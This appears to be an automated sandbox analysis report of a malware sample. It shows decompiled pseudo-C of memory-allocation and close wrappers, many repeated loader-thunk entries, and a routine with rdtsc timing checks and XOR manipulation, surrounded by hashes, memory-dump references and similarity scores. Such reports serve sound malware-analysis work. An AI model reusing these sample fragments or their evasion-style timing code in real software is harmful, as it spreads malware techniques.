Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
Instruction ID: 15e9253bdc6667238a85ff9da65bd6f3d3aad2e55959b4b07e7d113ae3ba9bea
Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
Instruction Fuzzy Hash: 6CF015B2200209ABDB14DF89CC81EEB77ADAF88754F118149FE0897241C630F910CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 004187C2, Relevance: 1.5, APIs: 1, Instructions: 29
memorynativeCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E004187C2() {
				long _t14;
				void* _t21;
				void* _t25;

				asm("in al, dx");
				_t10 =  *((intOrPtr*)(_t25 + 8));
				_t3 = _t10 + 0xc60; // 0xca0
				E004191E0(_t21,  *((intOrPtr*)(_t25 + 8)), _t3,  *((intOrPtr*)( *((intOrPtr*)(_t25 + 8)) + 0x10)), 0, 0x30);
				_t14 = NtAllocateVirtualMemory( *(_t25 + 0xc),  *(_t25 + 0x10),  *(_t25 + 0x14),  *(_t25 + 0x18),  *(_t25 + 0x1c),  *(_t25 + 0x20)); // executed
				return _t14;
			}

0x004187c2
0x004187c3
0x004187cf
0x004187d7
0x004187f9
0x004187fd

APIs

NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,004193B4,?,00000000,?,00003000,00000040,00000000,00000000,00408B13), ref: 004187F9

Memory Dump Source

Source File: 00000009.00000002.495256072.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: d141e42af92490f050884ded5524d08a377f3f87b9f48313ece682e970784e27
Instruction ID: f6e690475ae93a959fdc8485af364064d5dcee13894a993032aafcde413755c4
Opcode Fuzzy Hash: d141e42af92490f050884ded5524d08a377f3f87b9f48313ece682e970784e27
Instruction Fuzzy Hash: 42F015B2200109AFDB14DF89CC80EEB77A9AF88354F118249FA0897241C630E911CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00418710, Relevance: 1.5, APIs: 1, Instructions: 20
nativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00418710(intOrPtr _a4, void* _a8) {
				long _t8;
				void* _t11;

				_t5 = _a4;
				_t2 = _t5 + 0x10; // 0x300
				_t3 = _t5 + 0xc50; // 0x409763
				E004191E0(_t11, _a4, _t3,  *_t2, 0, 0x2c);
				_t8 = NtClose(_a8); // executed
				return _t8;
			}

0x00418713
0x00418716
0x0041871f
0x00418727
0x00418735
0x00418739

APIs

NtClose.NTDLL(00413D50,?,?,00413D50,00408B13,FFFFFFFF), ref: 00418735

Memory Dump Source

Source File: 00000009.00000002.495256072.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
Instruction ID: bce2094732f0dc6043ed148681cd5d29f2b757d64a263796670ac5fc8daf7d12
Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
Instruction Fuzzy Hash: 27D01776200214BBE710EB99CC89EE77BACEF48760F154499FA189B242C930FA40C6E0

Uniqueness

Uniqueness Score: -1.00%

Function 00C500C4, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00C500CF

Memory Dump Source

Source File: 00000009.00000002.495469291.0000000000C40000.00000040.00000001.sdmp, Offset: 00C30000, based on PE: true

Associated: 00000009.00000002.495464814.0000000000C30000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.495575739.0000000000D20000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.495580955.0000000000D30000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.495586053.0000000000D34000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.495590614.0000000000D37000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.495594769.0000000000D40000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.495635895.0000000000DA0000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
Instruction ID: e6c77262f5ba2182d122b5874ee39bb292c5f7eee28c199429390ea98cabeb31
Opcode Fuzzy Hash: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
Instruction Fuzzy Hash: 79B01272100940C7E309D724DD06F4B7210FFC0F01F008A3EA00B81851DA38A93CC846

Uniqueness

Uniqueness Score: -1.00%

Function 00C50048, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00C50053

Memory Dump Source

Source File: 00000009.00000002.495469291.0000000000C40000.00000040.00000001.sdmp, Offset: 00C30000, based on PE: true

Associated: 00000009.00000002.495464814.0000000000C30000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.495575739.0000000000D20000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.495580955.0000000000D30000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.495586053.0000000000D34000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.495590614.0000000000D37000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.495594769.0000000000D40000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.495635895.0000000000DA0000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 2990f9787256fe8461cfe6d04bba8dff018c5c70436f30267b6dae5db6cec36e
Instruction ID: 41e4343c146f66e2bb318e135f4e172b2897deff735033a37a94e91f6413aa4b
Opcode Fuzzy Hash: 2990f9787256fe8461cfe6d04bba8dff018c5c70436f30267b6dae5db6cec36e
Instruction Fuzzy Hash: DBB012B2100540C7E3099714D946B4B7210FB90F00F40C93BA11B81861DB3C993CD46A

Uniqueness

Uniqueness Score: -1.00%

Function 00C50078, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00C50086

Memory Dump Source

Source File: 00000009.00000002.495469291.0000000000C40000.00000040.00000001.sdmp, Offset: 00C30000, based on PE: true

Associated: 00000009.00000002.495464814.0000000000C30000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.495575739.0000000000D20000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.495580955.0000000000D30000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.495586053.0000000000D34000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.495590614.0000000000D37000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.495594769.0000000000D40000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.495635895.0000000000DA0000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: e361fdd744b37e572f0fb281d5ba342fdf237642d1eded7d2c73f776bcbc3673
Instruction ID: 3a645d05db048e5a2937cf36c3d58d647fc753ae06e93f94360992995f7f05c0
Opcode Fuzzy Hash: e361fdd744b37e572f0fb281d5ba342fdf237642d1eded7d2c73f776bcbc3673
Instruction Fuzzy Hash: 2AB012B1504640C7F304F704D905B16B212FBD0F00F408938A14F86591D73DAD2CC78B

Uniqueness

Uniqueness Score: -1.00%

Function 00C507AC, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00C507B7

Memory Dump Source

Source File: 00000009.00000002.495469291.0000000000C40000.00000040.00000001.sdmp, Offset: 00C30000, based on PE: true

Associated: 00000009.00000002.495464814.0000000000C30000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.495575739.0000000000D20000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.495580955.0000000000D30000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.495586053.0000000000D34000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.495590614.0000000000D37000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.495594769.0000000000D40000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.495635895.0000000000DA0000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
Instruction ID: cdb92b4df541c6703467cf01e2fb590a315ac15b2f911c24ec3250dccee83ae6
Opcode Fuzzy Hash: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
Instruction Fuzzy Hash: 64B01272200540C7E3099724D906B4B7310FB80F00F008D3AE04781892DB78992CD487

Uniqueness

Uniqueness Score: -1.00%

Function 00C4F9F0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00C4F9FB

Memory Dump Source

Source File: 00000009.00000002.495469291.0000000000C40000.00000040.00000001.sdmp, Offset: 00C30000, based on PE: true

Associated: 00000009.00000002.495464814.0000000000C30000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.495575739.0000000000D20000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.495580955.0000000000D30000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.495586053.0000000000D34000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.495590614.0000000000D37000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.495594769.0000000000D40000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.495635895.0000000000DA0000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
Instruction ID: 864711eabb7dc0f9c0a00528bc7204798e3bbfe8ecaf20bba7921b9fd7ea0c89
Opcode Fuzzy Hash: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
Instruction Fuzzy Hash: B8B012B2200640C7F3199714D90AF4BB310FBD0F00F00CA3AA00781890DA3C992CC44A

Uniqueness

Uniqueness Score: -1.00%

Function 00C4F900, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00C4F90E

Memory Dump Source

Source File: 00000009.00000002.495469291.0000000000C40000.00000040.00000001.sdmp, Offset: 00C30000, based on PE: true

Associated: 00000009.00000002.495464814.0000000000C30000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.495575739.0000000000D20000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.495580955.0000000000D30000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.495586053.0000000000D34000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.495590614.0000000000D37000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.495594769.0000000000D40000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.495635895.0000000000DA0000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
Instruction ID: 05ac91611fc184a3f88202f4b9a2f722369f22817df951cee1fa85cf63676e78
Opcode Fuzzy Hash: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
Instruction Fuzzy Hash: A2B01272605540C7F30ADB04D915B467251FBC0F00F408934E50746590D77D9E38D587

Uniqueness

Uniqueness Score: -1.00%

Function 00C4FAD0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00C4FADB

Memory Dump Source

Source File: 00000009.00000002.495469291.0000000000C40000.00000040.00000001.sdmp, Offset: 00C30000, based on PE: true

Associated: 00000009.00000002.495464814.0000000000C30000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.495575739.0000000000D20000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.495580955.0000000000D30000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.495586053.0000000000D34000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.495590614.0000000000D37000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.495594769.0000000000D40000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.495635895.0000000000DA0000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
Instruction ID: b885d126f35a04098635745a666b93c7a8e67e4acbf17db3f6051f78ecae7b76
Opcode Fuzzy Hash: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
Instruction Fuzzy Hash: 9AB01273104944C7E349A714DD06B8B7210FBC0F01F00893AA00786851DB389A2CE986

Uniqueness

Uniqueness Score: -1.00%

Function 00C4FAE8, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00C4FAF3

Memory Dump Source

Source File: 00000009.00000002.495469291.0000000000C40000.00000040.00000001.sdmp, Offset: 00C30000, based on PE: true

Associated: 00000009.00000002.495464814.0000000000C30000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.495575739.0000000000D20000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.495580955.0000000000D30000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.495586053.0000000000D34000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.495590614.0000000000D37000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.495594769.0000000000D40000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.495635895.0000000000DA0000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
Instruction ID: bb22edd625d441e86b4201bf2007cb1784deb073e32f09f3a807e6c8f80ed535
Opcode Fuzzy Hash: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
Instruction Fuzzy Hash: ACB01272104544C7F3099714ED06B8B7210FB80F00F00893AA007828A1DB39992CE456

Uniqueness

Uniqueness Score: -1.00%

Function 00C4FBB8, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00C4FBC3

Memory Dump Source

Source File: 00000009.00000002.495469291.0000000000C40000.00000040.00000001.sdmp, Offset: 00C30000, based on PE: true

Associated: 00000009.00000002.495464814.0000000000C30000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.495575739.0000000000D20000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.495580955.0000000000D30000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.495586053.0000000000D34000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.495590614.0000000000D37000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.495594769.0000000000D40000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.495635895.0000000000DA0000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
Instruction ID: 98b7ab4c3374ce945d87304c272764997da5ea40185bb6170513ade09291bf69
Opcode Fuzzy Hash: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
Instruction Fuzzy Hash: 97B012721005C4C7E30D9714D906B8F7210FB80F00F00893AA40782861DB789A2CE45A

Uniqueness

Uniqueness Score: -1.00%

Function 00C4FB68, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00C4FB73

Memory Dump Source

Source File: 00000009.00000002.495469291.0000000000C40000.00000040.00000001.sdmp, Offset: 00C30000, based on PE: true

Associated: 00000009.00000002.495464814.0000000000C30000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.495575739.0000000000D20000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.495580955.0000000000D30000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.495586053.0000000000D34000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.495590614.0000000000D37000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.495594769.0000000000D40000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.495635895.0000000000DA0000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
Instruction ID: fe3894545e6d7ff35e2d014bd1b41c27fc981d7cba2425ddd0908e3dd582fca9
Opcode Fuzzy Hash: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
Instruction Fuzzy Hash: 17B01272100544C7E3099714D906B8B7210FB80F00F008E3AA04782991DB78992DE446

Uniqueness

Uniqueness Score: -1.00%

Function 00C4FC90, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00C4FC9B

Memory Dump Source

Source File: 00000009.00000002.495469291.0000000000C40000.00000040.00000001.sdmp, Offset: 00C30000, based on PE: true

Associated: 00000009.00000002.495464814.0000000000C30000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.495575739.0000000000D20000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.495580955.0000000000D30000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.495586053.0000000000D34000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.495590614.0000000000D37000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.495594769.0000000000D40000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.495635895.0000000000DA0000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: c03c3f025ade335fb37a3227fdd9bdec0ce29723ea859b950f344d641557639d
Instruction ID: 41c45e5f09b42d6e0ddb2dc3248e04f5cc5ab51982cd1fe1d329002f24c15819
Opcode Fuzzy Hash: c03c3f025ade335fb37a3227fdd9bdec0ce29723ea859b950f344d641557639d
Instruction Fuzzy Hash: 14B01272104580C7E349AB14D90AB5BB210FB90F00F40893AE04B81850DA3C992CC546

Uniqueness

Uniqueness Score: -1.00%

Function 00C4FC60, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00C4FC6B

Memory Dump Source

Source File: 00000009.00000002.495469291.0000000000C40000.00000040.00000001.sdmp, Offset: 00C30000, based on PE: true

Associated: 00000009.00000002.495464814.0000000000C30000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.495575739.0000000000D20000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.495580955.0000000000D30000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.495586053.0000000000D34000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.495590614.0000000000D37000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.495594769.0000000000D40000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.495635895.0000000000DA0000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
Instruction ID: 69502d12976c3e383ebc8ea250e6427301c1fd9f045747c541fd94b810363c34
Opcode Fuzzy Hash: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
Instruction Fuzzy Hash: 3AB01277105940C7E349A714DD0AB5B7220FBC0F01F00893AE00781890DA38993CC54A

Uniqueness

Uniqueness Score: -1.00%

Function 00C4FDC0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00C4FDCB

Memory Dump Source

Source File: 00000009.00000002.495469291.0000000000C40000.00000040.00000001.sdmp, Offset: 00C30000, based on PE: true

Associated: 00000009.00000002.495464814.0000000000C30000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.495575739.0000000000D20000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.495580955.0000000000D30000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.495586053.0000000000D34000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.495590614.0000000000D37000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.495594769.0000000000D40000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.495635895.0000000000DA0000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
Instruction ID: d88988b585cc81dca5f800d6bb39f1198a76ae257c125849f4a62a02810904f6
Opcode Fuzzy Hash: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
Instruction Fuzzy Hash: 20B01272140540C7E30A9714DA56B4B7220FB80F40F008D3AA04781891DBB89B2CD486

Uniqueness

Uniqueness Score: -1.00%

Function 00C4FD8C, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00C4FD9A

Memory Dump Source

Source File: 00000009.00000002.495469291.0000000000C40000.00000040.00000001.sdmp, Offset: 00C30000, based on PE: true

Associated: 00000009.00000002.495464814.0000000000C30000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.495575739.0000000000D20000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.495580955.0000000000D30000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.495586053.0000000000D34000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.495590614.0000000000D37000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.495594769.0000000000D40000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.495635895.0000000000DA0000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
Instruction ID: c46011bb0c46dfed5c8ab186c0f719e5b9e72ad0d6ef7da6a0d9d2ed8661a3c9
Opcode Fuzzy Hash: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
Instruction Fuzzy Hash: 8FB0927110054087E205A704D905B4AB212FB90B00F808A35A4468A591D66A9A28C686

Uniqueness

Uniqueness Score: -1.00%

Function 00C4FED0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00C4FEDB

Memory Dump Source

Source File: 00000009.00000002.495469291.0000000000C40000.00000040.00000001.sdmp, Offset: 00C30000, based on PE: true

Associated: 00000009.00000002.495464814.0000000000C30000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.495575739.0000000000D20000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.495580955.0000000000D30000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.495586053.0000000000D34000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.495590614.0000000000D37000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.495594769.0000000000D40000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.495635895.0000000000DA0000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
Instruction ID: 9b30904a3bfeb6814e26683714e5c097bc05a41d35c26203adaeaac906fc0f52
Opcode Fuzzy Hash: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
Instruction Fuzzy Hash: C9B01272100580C7E34EA714D906B4B7210FB80F00F408A3AA00781891DB789B2CD98A

Uniqueness

Uniqueness Score: -1.00%

Function 00C4FEA0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00C4FEAB

Memory Dump Source

Source File: 00000009.00000002.495469291.0000000000C40000.00000040.00000001.sdmp, Offset: 00C30000, based on PE: true

Associated: 00000009.00000002.495464814.0000000000C30000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.495575739.0000000000D20000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.495580955.0000000000D30000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.495586053.0000000000D34000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.495590614.0000000000D37000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.495594769.0000000000D40000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.495635895.0000000000DA0000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 6032af2d0d5c3e144073b0b78b369b1f4db831bf511812c370cfa36f16aa84fd
Instruction ID: c5322eb374cbfb3adeb08d178b54e1ae74a7d58a0408861c097d1ba4bd942992
Opcode Fuzzy Hash: 6032af2d0d5c3e144073b0b78b369b1f4db831bf511812c370cfa36f16aa84fd
Instruction Fuzzy Hash: 0DB01272200640C7F31A9714D906F4B7210FB80F00F00893AA007C19A1DB389A2CD556

Uniqueness

Uniqueness Score: -1.00%

Function 00C4FFB4, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00C4FFBF

Memory Dump Source

Source File: 00000009.00000002.495469291.0000000000C40000.00000040.00000001.sdmp, Offset: 00C30000, based on PE: true

Associated: 00000009.00000002.495464814.0000000000C30000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.495575739.0000000000D20000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.495580955.0000000000D30000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.495586053.0000000000D34000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.495590614.0000000000D37000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.495594769.0000000000D40000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.495635895.0000000000DA0000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
Instruction ID: 7e2af0442ae64c9f6bb8df8c94f4cb17495a0f0e8e42cafe04a2b86fa0e4786e
Opcode Fuzzy Hash: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
Instruction Fuzzy Hash: A2B012B2104580C7E3099714D906F4B7210FB90F00F40893EA00F81851DB3CD92CD44A

Uniqueness

Uniqueness Score: -1.00%

Function 004088D0, Relevance: .1, Instructions: 92
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E004088D0(intOrPtr _a4) {
				intOrPtr _v8;
				char _v24;
				char _v284;
				char _v804;
				char _v840;
				void* _t24;
				void* _t31;
				void* _t33;
				void* _t34;
				void* _t39;
				void* _t50;
				intOrPtr _t52;
				void* _t53;
				void* _t54;
				void* _t55;
				void* _t56;

				_t52 = _a4;
				_t39 = 0; // executed
				_t24 = E00406E20(_t52,  &_v24); // executed
				_t54 = _t53 + 8;
				if(_t24 != 0) {
					E00407030( &_v24,  &_v840);
					_t55 = _t54 + 8;
					do {
						E0041A100( &_v284, 0x104);
						E0041A770( &_v284,  &_v804);
						_t56 = _t55 + 0x10;
						_t50 = 0x4f;
						while(1) {
							_t31 = E00413DF0(E00413D90(_t52, _t50),  &_v284);
							_t56 = _t56 + 0x10;
							if(_t31 != 0) {
								break;
							}
							_t50 = _t50 + 1;
							if(_t50 <= 0x62) {
								continue;
							} else {
							}
							goto L8;
						}
						_t9 = _t52 + 0x14; // 0xffffe1a5
						 *(_t52 + 0x474) =  *(_t52 + 0x474) ^  *_t9;
						_t39 = 1;
						L8:
						_t33 = E00407060( &_v24,  &_v840);
						_t55 = _t56 + 8;
					} while (_t33 != 0 && _t39 == 0);
					_t34 = E004070E0(_t52,  &_v24); // executed
					if(_t39 == 0) {
						asm("rdtsc");
						asm("rdtsc");
						_v8 = _t34 - 0 + _t34;
						 *((intOrPtr*)(_t52 + 0x55c)) =  *((intOrPtr*)(_t52 + 0x55c)) + 0xffffffba;
					}
					 *((intOrPtr*)(_t52 + 0x31)) =  *((intOrPtr*)(_t52 + 0x31)) + _t39;
					_t20 = _t52 + 0x31; // 0x5608758b
					 *((intOrPtr*)(_t52 + 0x32)) =  *((intOrPtr*)(_t52 + 0x32)) +  *_t20 + 1;
					return 1;
				} else {
					return _t24;
				}
			}

0x004088db
0x004088e3
0x004088e5
0x004088ea
0x004088ef
0x00408902
0x00408907
0x00408910
0x0040891c
0x0040892f
0x00408934
0x00408937
0x00408940
0x00408952
0x00408957
0x0040895c
0x00000000
0x00000000
0x0040895e
0x00408962
0x00000000
0x00000000
0x00408964
0x00000000
0x00408962
0x00408966
0x00408969
0x0040896f
0x00408971
0x0040897c
0x00408981
0x00408984
0x00408991
0x0040899c
0x0040899e
0x004089a4
0x004089a8
0x004089ab
0x004089ab
0x004089b2
